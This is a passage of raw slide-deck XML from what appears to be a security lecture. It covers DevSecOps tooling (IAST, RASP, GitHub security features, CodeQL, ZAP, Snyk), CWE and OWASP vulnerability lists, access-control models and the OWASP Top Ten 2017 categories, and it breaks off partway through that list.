              <a:t>ntegrated into the CI/CD pipeline</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="-342900" lvl="1" marL="914400" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1800"/>
              <a:buChar char="○"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>May slow down the app.</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="-342900" lvl="0" marL="457200" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1800"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>Run-time Application Security Protection (RASP)</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="-342900" lvl="1" marL="914400" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1800"/>
              <a:buChar char="○"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>Works inside the application as IAST. </a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="-342900" lvl="1" marL="914400" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1800"/>
              <a:buChar char="○"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>Block attacks instead of vulnerability detection.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DevSecOps</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="300" name="Google Shape;300;p50"/>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1" name="Google Shape;301;p50"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId3">
            <a:alphaModFix/>
          </a:blip>
          <a:srcRect b="0" l="0" r="0" t="11347"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="438975" y="925849"/>
            <a:ext cx="6514824" cy="3819124"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="302" name="Google Shape;302;p50"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1284550" y="4744975"/>
            <a:ext cx="64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https://www.catchpoint.com/blog/devops-india-summit-2020</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="303" name="Google Shape;303;p50"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId4">
            <a:alphaModFix/>
          </a:blip>
          <a:srcRect b="0" l="0" r="0" t="0"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="6894150" y="172789"/>
            <a:ext cx="2249852" cy="1157835"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="304" name="Google Shape;304;p50"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7733325" y="118250"/>
            <a:ext cx="57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OWASP DevSecOps Guideline</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="310" name="Google Shape;310;p51"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="1" type="body"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="311700" y="2053600"/>
            <a:ext cx="8520600" cy="25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https://github.com/OWASP/DevSecOpsGuideline</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="1600"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>Set up DevSecOps pipeline through github actions: </a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="1600"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" u="sng">
                <a:solidFill>
                  <a:schemeClr val="hlink"/>
                </a:solidFill>
                <a:hlinkClick r:id="rId4"/>
              </a:rPr>
              <a:t>https://www.youtube.com/watch?v=_m5KYEi1ThA&amp;list=PLrsbMazVPK_pt9u_PiTGAb3s9aw8ashvQ&amp;index=2</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en"/>
              <a:t> </a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="-342900" lvl="0" marL="457200" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="1600"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1800"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>Github out of box support: action, security (dependabot, code scanning, secret scanning, …)</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="-342900" lvl="0" marL="457200" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1800"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>Github marketplace: CodeQL, SonarQube, ZAP, Snyk, …</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="311" name="Google Shape;311;p51"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId5">
            <a:alphaModFix/>
          </a:blip>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="222400" y="966602"/>
            <a:ext cx="8699200" cy="97694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2"/>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Vulnerability Lists</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="317" name="Google Shape;317;p52"/>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Common Weakness Enumeration (</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="2000" u="sng">
                <a:solidFill>
                  <a:srgbClr val="00578A"/>
                </a:solidFill>
                <a:highlight>
                  <a:srgbClr val="FFFFFF"/>
                </a:highlight>
                <a:hlinkClick r:id="rId3">
                  <a:extLst>
                    <a:ext uri="{A12FA001-AC4F-418D-AE19-62706E023703}">
                      <ahyp:hlinkClr val="tx"/>
                    </a:ext>
                  </a:extLst>
                </a:hlinkClick>
              </a:rPr>
              <a:t>CWE</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="2000">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:highlight>
                  <a:srgbClr val="FFFFFF"/>
                </a:highlight>
              </a:rPr>
              <a:t> )</a:t>
            </a:r>
            <a:endParaRPr sz="2000">
              <a:solidFill>
                <a:schemeClr val="dk1"/>
              </a:solidFill>
              <a:highlight>
                <a:srgbClr val="FFFFFF"/>
              </a:highlight>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="-355600" lvl="1" marL="914400" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="2000"/>
              <a:buChar char="○"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>Common software and hardware security weakness </a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="-355600" lvl="1" marL="914400" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="2000"/>
              <a:buChar char="○"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>flaws, faults, bugs, vulnerabilities, or other errors in software or hardware implementation, code, design, or architecture </a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="-342900" lvl="1" marL="914400" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1800"/>
              <a:buChar char="○"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>The </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" u="sng">
                <a:solidFill>
                  <a:srgbClr val="000066"/>
                </a:solidFill>
                <a:latin typeface="Verdana"/>
                <a:ea typeface="Verdana"/>
                <a:cs typeface="Verdana"/>
                <a:sym typeface="Verdana"/>
                <a:hlinkClick r:id="rId4">
                  <a:extLst>
                    <a:ext uri="{A12FA001-AC4F-418D-AE19-62706E023703}">
                      <ahyp:hlinkClr val="tx"/>
                    </a:ext>
                  </a:extLst>
                </a:hlinkClick>
              </a:rPr>
              <a:t>CWE List</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1100">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:latin typeface="Verdana"/>
                <a:ea typeface="Verdana"/>
                <a:cs typeface="Verdana"/>
                <a:sym typeface="Verdana"/>
              </a:rPr>
              <a:t>:</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en"/>
              <a:t> associated classification taxonomy</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="-355600" lvl="1" marL="914400" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="2000"/>
              <a:buChar char="○"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="2000">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>The </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="2000" u="sng">
                <a:solidFill>
                  <a:srgbClr val="000066"/>
                </a:solidFill>
                <a:hlinkClick r:id="rId5">
                  <a:extLst>
                    <a:ext uri="{A12FA001-AC4F-418D-AE19-62706E023703}">
                      <ahyp:hlinkClr val="tx"/>
                    </a:ext>
                  </a:extLst>
                </a:hlinkClick>
              </a:rPr>
              <a:t>CWE Top 25 Most Dangerous Software Errors List</a:t>
            </a:r>
            <a:endParaRPr sz="2000"/>
          </a:p>
          <a:p>
            <a:pPr indent="-355600" lvl="0" marL="457200" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="2000"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="2000" u="sng">
                <a:solidFill>
                  <a:schemeClr val="hlink"/>
                </a:solidFill>
                <a:hlinkClick r:id="rId6"/>
              </a:rPr>
              <a:t>OWASP</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="2000"/>
              <a:t> (The Open Web Application Security Project)</a:t>
            </a:r>
            <a:endParaRPr sz="2000"/>
          </a:p>
          <a:p>
            <a:pPr indent="-355600" lvl="1" marL="914400" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="2000"/>
              <a:buChar char="○"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="2000"/>
              <a:t>OWASP Top Ten</a:t>
            </a:r>
            <a:endParaRPr sz="2000"/>
          </a:p>
          <a:p>
            <a:pPr indent="-355600" lvl="1" marL="914400" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="2000"/>
              <a:buChar char="○"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="2000"/>
              <a:t>OWASP Mobile Top 10</a:t>
            </a:r>
            <a:endParaRPr sz="2000"/>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="457200" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="1600"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="16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Control</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="79" name="Google Shape;79;p17"/>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DAC (Discretionary Access Control): </a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="-342900" lvl="1" marL="914400" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1800"/>
              <a:buChar char="○"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>Access is based on identity of the subjects. </a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="-342900" lvl="1" marL="914400" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1800"/>
              <a:buChar char="○"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>The owner of the object can change the access permission at its discretionary.</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="-342900" lvl="0" marL="457200" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1800"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>MAC (Mandatory Access Control):</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="-342900" lvl="1" marL="914400" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1800"/>
              <a:buChar char="○"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>The access is controlled by OS</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="-342900" lvl="0" marL="457200" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1800"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>RBAC (Role Based Access Control):</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="-342900" lvl="1" marL="914400" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1800"/>
              <a:buChar char="○"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>Access based on the role a subject is assigned to.</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3"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="457172" y="205014"/>
            <a:ext cx="8228700" cy="858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3700" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:ea typeface="Arial"/>
                <a:cs typeface="Arial"/>
                <a:sym typeface="Arial"/>
              </a:rPr>
              <a:t>OWASP Top Ten</a:t>
            </a:r>
            <a:endParaRPr b="0" sz="3700" strike="noStrike">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="Arial"/>
              <a:ea typeface="Arial"/>
              <a:cs typeface="Arial"/>
              <a:sym typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="323" name="Google Shape;323;p53"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="457175" y="1203625"/>
            <a:ext cx="8452200" cy="3394800"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchorCtr="0" anchor="t" bIns="0" lIns="0" spcFirstLastPara="1" rIns="0" wrap="square" tIns="0">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr indent="-304800" lvl="0" marL="355600" marR="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:srgbClr val="000000"/>
              </a:buClr>
              <a:buSzPts val="1800"/>
              <a:buFont typeface="Noto Sans Symbols"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1800" u="sng">
                <a:solidFill>
                  <a:schemeClr val="hlink"/>
                </a:solidFill>
                <a:hlinkClick r:id="rId3"/>
              </a:rPr>
              <a:t>https://www.owasp.org/images/7/72/OWASP_Top_10-2017_%28en%29.pdf.pdf</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1800"/>
              <a:t> </a:t>
            </a:r>
            <a:endParaRPr b="0" sz="1800" strike="noStrike">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="Arial"/>
              <a:ea typeface="Arial"/>
              <a:cs typeface="Arial"/>
              <a:sym typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="-304800" lvl="0" marL="355600" marR="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:srgbClr val="000000"/>
              </a:buClr>
              <a:buSzPts val="1800"/>
              <a:buFont typeface="Noto Sans Symbols"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr b="0" lang="en" sz="1800" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:ea typeface="Arial"/>
                <a:cs typeface="Arial"/>
                <a:sym typeface="Arial"/>
              </a:rPr>
              <a:t>A1-Injection</a:t>
            </a:r>
            <a:endParaRPr b="0" sz="1800" strike="noStrike">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="Arial"/>
              <a:ea typeface="Arial"/>
              <a:cs typeface="Arial"/>
              <a:sym typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="-304800" lvl="0" marL="355600" marR="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:srgbClr val="000000"/>
              </a:buClr>
              <a:buSzPts val="1800"/>
              <a:buFont typeface="Noto Sans Symbols"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr b="0" lang="en" sz="1800" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:ea typeface="Arial"/>
                <a:cs typeface="Arial"/>
                <a:sym typeface="Arial"/>
              </a:rPr>
              <a:t>A2-Broken Authentication and Session Management</a:t>
            </a:r>
            <a:endParaRPr b="0" sz="1800" strike="noStrike">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="Arial"/>
              <a:ea typeface="Arial"/>
              <a:cs typeface="Arial"/>
              <a:sym typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="-304800" lvl="0" marL="355600" marR="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:srgbClr val="000000"/>
              </a:buClr>
              <a:buSzPts val="1800"/>
              <a:buFont typeface="Noto Sans Symbols"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr b="0" lang="en" sz="1800" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:ea typeface="Arial"/>
                <a:cs typeface="Arial"/>
                <a:sym typeface="Arial"/>
              </a:rPr>
              <a:t>A3-</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1800"/>
              <a:t>Sensitive Data Exposure</a:t>
            </a:r>
            <a:endParaRPr sz="1800"/>
          </a:p>
          <a:p>
            <a:pPr indent="-304800" lvl="0" marL="355600" marR="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:srgbClr val="000000"/>
              </a:buClr>
              <a:buSzPts val="1800"/>
              <a:buFont typeface="Noto Sans Symbols"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr b="0" lang="en" sz="1800" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:ea typeface="Arial"/>
                <a:cs typeface="Arial"/>
                <a:sym typeface="Arial"/>
              </a:rPr>
              <a:t>A4-</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1800"/>
              <a:t>XML External Entities (XXE)</a:t>
            </a:r>
            <a:endParaRPr b="0" sz="1800" strike="noStrike">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="Arial"/>
              <a:ea typeface="Arial"/>
              <a:cs typeface="Arial"/>
              <a:sym typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="-304800" lvl="0" marL="355600" marR="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:srgbClr val="000000"/>
              </a:buClr>
              <a:buSzPts val="1800"/>
              <a:buFont typeface="Noto Sans Symbols"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr b="0" lang="en" sz="1800" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:ea typeface="Arial"/>
                <a:cs typeface="Arial"/>
                <a:sym typeface="Arial"/>
              </a:rPr>
              <a:t>A5-Broken Access Control</a:t>
            </a:r>
            <a:endParaRPr b="0" sz="1800" strike="noStrike">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="Arial"/>
              <a:ea typeface="Arial"/>
              <a:cs typeface="Arial"/>
              <a:sym typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="-304800" lvl="0" marL="355600" marR="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:srgbClr val="000000"/>
              </a:buClr>
              <a:buSzPts val="1800"/>
              <a:buFont typeface="Noto Sans Symbols"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1800"/>
              <a:t>A6-</a:t>
            </a:r>
            <a:r>
              <a:rPr b="0" lang="en" sz="1800" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:ea typeface="Arial"/>
                <a:cs typeface="Arial"/>
                <a:sym typeface="Arial"/>
              </a:rPr>
              <a:t>Security Misconfiguration</a:t>
            </a:r>
            <a:endParaRPr b="0" sz="1800" strike="noStrike">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="Arial"/>
              <a:ea typeface="Arial"/>
              <a:cs typeface="Arial"/>
              <a:sym typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="-304800" lvl="0" marL="355600" marR="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:srgbClr val="000000"/>
              </a:buClr>
              <a:buSzPts val="1800"/>
              <a:buFont typeface="Noto Sans Symbols"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr b="0" lang="en" sz="1800" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:ea typeface="Arial"/>
                <a:cs typeface="Arial"/>
                <a:sym typeface="Arial"/>
              </a:rPr>
              <a:t>A7-Cross-Site Scripting </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1800"/>
              <a:t>(XSS)</a:t>
            </a:r>
            <a:endParaRPr sz="1800"/>
          </a:p>
          <a:p>
            <a:pPr indent="-304800" lvl="0" marL="355600" marR="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:srgbClr val="000000"/>
              </a:buClr>
              <a:buSzPts val="1800"/>
              <a:buFont typeface="Noto Sans Symbols"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr b="0" lang="en" sz="1800" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:ea typeface="Arial"/>
                <a:cs typeface="Arial"/>
                <a:sym typeface="Arial"/>
              </a:rPr>
              <a:t>A8-Insecure Deseri</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1800"/>
              <a:t>alization</a:t>
            </a:r>
            <a:endParaRPr sz="1800"/>
          </a:p>
          <a:p>
            <a:pPr indent="-304800" lvl="0" marL="355600" marR="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:srgbClr val="000000"/>
              </a:buClr>
              <a:buSzPts val="1800"/>
              <a:buFont typeface="Noto Sans Symbols"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr b="0" lang="en" sz="1800" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:ea typeface="Arial"/>
                <a:cs typeface="Arial"/>
                <a:sym typeface="Arial"/>
              </a:rPr>
              <a:t>A9-Using Components with Known Vulnerabilities</a:t>
            </a:r>
            <a:endParaRPr b="0" sz="1800" strike="noStrike">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="Arial"/>
              <a:ea typeface="Arial"/>
              <a:cs typeface="Arial"/>
              <a:sym typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="-304800" lvl="0" marL="355600" marR="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:srgbClr val="000000"/>
              </a:buClr>
